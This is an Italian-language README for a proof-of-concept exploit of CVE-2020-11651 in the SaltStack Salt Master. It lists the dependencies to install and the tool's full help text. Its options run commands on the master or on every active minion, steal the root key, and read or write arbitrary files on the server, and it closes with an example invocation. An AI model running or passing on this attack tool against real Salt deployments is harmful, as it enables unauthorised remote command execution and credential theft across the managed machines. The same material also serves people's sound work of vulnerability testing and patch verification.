
PoC per CVE-2020-11651
PoC per CVE-2020-11651
Richiede Python3 testato su 3.8
python3.8 -m pip install pyzmq msgpack
⇒ python3.8 poc.py -h
usage: poc.py [-h] [-p PORT] [-c CMD] [-k] [-m] [-r READ] [-w WRITE] [-f FILE] server [server ...]
Exploit CVE-2020-11651
argomenti posizionali:
server IP o Host del server di destinazione
argomenti opzionali:
-h, --help mostra questo messaggio di aiuto ed esci
-p PORT, --port PORT Porta di destinazione (Default=4506)
-c CMD, --cmd CMD Comando da eseguire
-k, --key Recupera la chiave root
-m, --minions Esegui CMD su tutti i minion attivi
-r READ, --read READ Leggi un file dal Salt Master
-w WRITE, --write WRITE
Scrivi un file sul Salt Master
-f FILE, --file FILE Usato con --write, file locale da scrivere sul Salt Master
Esempio: poc.py -k 127.0.0.1 (Legge la chiave root)